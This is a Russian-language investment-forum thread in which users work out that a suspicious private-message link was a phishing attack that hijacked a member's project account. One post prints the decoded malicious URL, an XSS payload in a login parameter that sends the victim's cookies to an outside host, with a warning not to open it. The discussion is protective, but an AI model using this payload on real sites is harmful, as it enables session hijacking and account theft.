• Добро пожаловать на инвестиционный форум!

    Во всем многообразии инвестиций трудно разобраться. MMGP станет вашим надежным помощником и путеводителем в мире инвестиций. Только самые последние тренды, передовые технологии и новые возможности. 400 тысяч пользователей уже выбрали нас. Самые актуальные новости, проверенные стратегии и способы заработка. Сюда люди приходят поделиться своим опытом, найти и обсудить новые перспективы. 16 миллионов сообщений, оставленных нашими пользователями, содержат их бесценный опыт и знания. Присоединяйтесь и вы!

    Впрочем, для начала надо зарегистрироваться!
  • 🐑 Моисей водил бесплатно. А мы платим, хотя тоже планируем работать 40 лет! Принимай участие в партнеской программе MMGP
  • 📝 Знаешь буквы и умеешь их компоновать? Платим. Дорого. Бессрочная акция от MMGP: "ОПЛАТА ЗА СООБЩЕНИЯ"

Монитор hyipexplorer.com - мошенник

xaza

ТОП-МАСТЕР
Регистрация
25.11.2011
Сообщения
6,091
Реакции
7,015
Поинты
31.330
Предыстория:

На одном из форумов в личку пришло сообщение от пользователя hyipexplore. Содержание : Активная ссылка под надписью Об окончании работы проекта!.
Конечно сам виноват, что не проверив, нажал на ссылку, в итоге был мгновенный редирект через сайт на сайт проекта compass-business.org.
Я сразу окно закрыл. После чего попытался войти в аккаунт compass-business.org. Не тут то было. войти не смог, стал делать восстановление пароля через форму когда вводил свой e-mail выдавал ответ, что такой пользователь не найден, когда вводил логин, то пароль высылался, но на мою почту естественно не приходил. Мгновенно была заменена почта и пароль в аккаунте.
Вот эта ссылка: hyipexplorer точка ml/compass-business6 точка php

Сайт hyipexplorer.ml делает редирект на hyipexplorer.com
На этом основании я заявляю что монитор hyipexplorer.com мошенник
 

DaTre

ТОП-МАСТЕР
Регистрация
29.02.2008
Сообщения
29,214
Реакции
5,095
Поинты
0.000
Ошибаетесь ) Монитор к этому фишингу отношения не имеет. Были зареганы акки еще нескольких мониторов с похожими никами, и все сообщения были "SCAM ALERT". Все ссылки вели на кукисы и пароли. Это обыкновенные мошенники и воришки. Я тоже с дуру тыкнул, но моя опера не поддерживает SSL соединение, поэтому я никуда так и не попал :)
 

xaza

ТОП-МАСТЕР
Регистрация
25.11.2011
Сообщения
6,091
Реакции
7,015
Поинты
31.330
Ошибаетесь ) Монитор к этому фишингу отношения не имеет. Были зареганы акки еще нескольких мониторов с похожими никами, и все сообщения были "SCAM ALERT". Все ссылки вели на кукисы и пароли. Это обыкновенные мошенники и воришки. Я тоже с дуру тыкнул, но моя опера не поддерживает SSL соединение, поэтому я никуда так и не попал :)

Да, я уже разобрался.

Приношу свои извинения монитору за свои поспешные выводы
 

Smirnov Nikolay

ТОП-МАСТЕР
Регистрация
07.02.2013
Сообщения
57,751
Реакции
43,403
Поинты
0.000
..я уже разобрался.

Я вот не совсем, как у вас утянули пароль и почту? Пройдя просто по ссылке? В спам падает куча предложений о проектах там почти всегда стоит редирект, что тогда получается, если жмакнуть, можно и все свои пароли отдать?

:help1:
 

DaTre

ТОП-МАСТЕР
Регистрация
29.02.2008
Сообщения
29,214
Реакции
5,095
Поинты
0.000
goo.gl/uS1lTn - ссылка мошенника

реальный адрес:
asixtrust.com/index.php?a=login&username=%22%20autofocus%20src=%22ХТТП://vvvvvv.besaba.com/asix.php?cookie=%22%20onfocus=%22x=document.cookie;y=src.toString().concat(x.toString());src=y;location.href=this.src

Само собой, не тыкать и в браузер не вписывать.
 

Smirnov Nikolay

ТОП-МАСТЕР
Регистрация
07.02.2013
Сообщения
57,751
Реакции
43,403
Поинты
0.000
Вот блин редирект от гугловского сервиса сокращенных ссылок, я иногда по спаму тыку проекты, которые приходят.. :rolleyes: Все больше не буду. :eek:
 

transmega

Профессионал
Регистрация
23.04.2014
Сообщения
1,266
Реакции
1,057
Поинты
0.000
А мне если сильно интересно что за шлак мне прислали (в который, разумеется, ни ногой), иду на сервис, который расшифровывает эти сокращенные ссылки и узнаю адрес шлака. Или бывает просто навожу на ссылку, не жмакая, и внизу слева адрес. Иногда перепечатывать вручную в сервисе расшифровки приходится.
 
Сверху Снизу